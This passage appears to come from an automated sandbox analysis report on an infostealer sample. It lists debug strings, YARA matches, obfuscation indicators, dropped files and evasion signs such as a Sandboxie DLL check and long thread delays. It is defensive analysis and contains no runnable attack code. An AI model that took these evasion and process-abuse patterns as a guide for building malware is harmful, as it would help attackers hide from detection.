Source: Binary string: \??\C:\Windows\mscorlib.pdbBC source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb8W source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: powershell.pdb source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb? source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 7.2.849128312.cmd.Fjz.4e17544.5.raw.unpack, GetterBroadcasterConsumer.cs .Net Code: TestToken System.AppDomain.Load(byte[])
Source: Yara match File source: 7.2.849128312.cmd.Fjz.6589638.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.849128312.cmd.Fjz.87c0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.stealer-CR-0110.exe.7130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.849128312.cmd.Fjz.63e2288.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2241217734.0000000007130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2217536851.00000000087C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: stealer-CR-0110.exe PID: 6396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D8B6EA push es; ret 7_2_06D8B718
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D894E9 push es; ret 7_2_06D894EC
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D83BDB push es; ret 7_2_06D83BDC
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBE738 push es; ret 7_2_06DBE7F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DB850F push es; retf 7_2_06DB851C
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DB6086 push ecx; ret 7_2_06DB6089
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DB89E3 push es; retf 7_2_06DB89F4
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DF440D push FFFFFF8Bh; iretd 7_2_06DF440F
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DF4535 push FFFFFF8Bh; iretd 7_2_06DF4537
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DF43F3 push FFFFFF8Bh; ret 7_2_06DF43F8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DF43B9 push FFFFFF8Bh; ret 7_2_06DF43BE
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_074504A9 push eax; iretd 7_2_074504C1
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E3F50C pushfd ; ret 7_2_08E3F50D
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E5B2FF push ebx; retf 7_2_08E5B300
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E5472D push eax; iretd 7_2_08E5472E
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_02648DF5 push B8FFFF9Fh; iretd 8_2_02648DFA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0495C3C0 push ebp; ret 8_2_0495C3C1
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D644D8 pushfd ; retf 8_2_05D644D9
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D68250 pushad ; iretd 8_2_05D68251
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05DA54E0 push FFFFFF80h; ret 8_2_05DA54E4
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_07097C29 push edx; ret 8_2_07097C2A
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_07097033 push edx; iretd 8_2_07097036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 13_2_025D0743 pushad ; retf 13_2_025D07A5
Source: 7.2.849128312.cmd.Fjz.86e0000.18.raw.unpack, s1o4cko7nwCvsxsaJYt.cs High entropy of concatenated method names: 'o57o1x5t9T', 'TDAYMERSj7Lmu7YpXMf', 'hA7Y6ZRP5r4kgKjmXfc', 'jNK70YRG8BePVhDLtFS', 'a2C4pqR4Exva4GHXvnn', 'DE3eUpRX1qDxPSH9axv', 'puvo6MRwxNHFuScM0vk', 'Tns9CyRlFsrm5ggVcjT'
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Users\user\Desktop\849128312.cmd.Fjz File created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: stealer-CR-0110.exe PID: 6396, type: MEMORYSTR
Source: c:\users\user\desktop\849128312.cmd.fjz Key value queried: Powershell behavior
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Memory allocated: 4A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory allocated: 2640000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory allocated: 2830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory allocated: 4930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory allocated: 5D10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Memory allocated: 6D10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2CB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2E60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4E60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2530000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 27A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 599076
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598966
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598835
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598712
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598593
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598244
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 598016
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597766
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597313
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597193
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596948
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596698
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596567
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596230
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 595982
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 595867
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Thread delayed: delay time: 595735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596699
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595811
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593873
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593327
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Window / User API: threadDelayed 4959
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Window / User API: threadDelayed 4684
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Window / User API: threadDelayed 2712
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Window / User API: threadDelayed 3057
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5390
Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 6004 Thread sleep count: 4959 > 30
Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 1412 Thread sleep count: 4684 > 30
Source: C:\Users\user\Desktop\849128312.cmd.Fjz TID: 6428 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 2284 Thread sleep count: 2712 > 30
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 2284 Thread sleep count: 3057 > 30
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -599076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598966s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598835s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598712s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598244s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -598016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -597063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -596948s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -596698s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -596567s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -596230s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -596108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -595982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe TID: 1272 Thread sleep time: -595867s >= -30000s
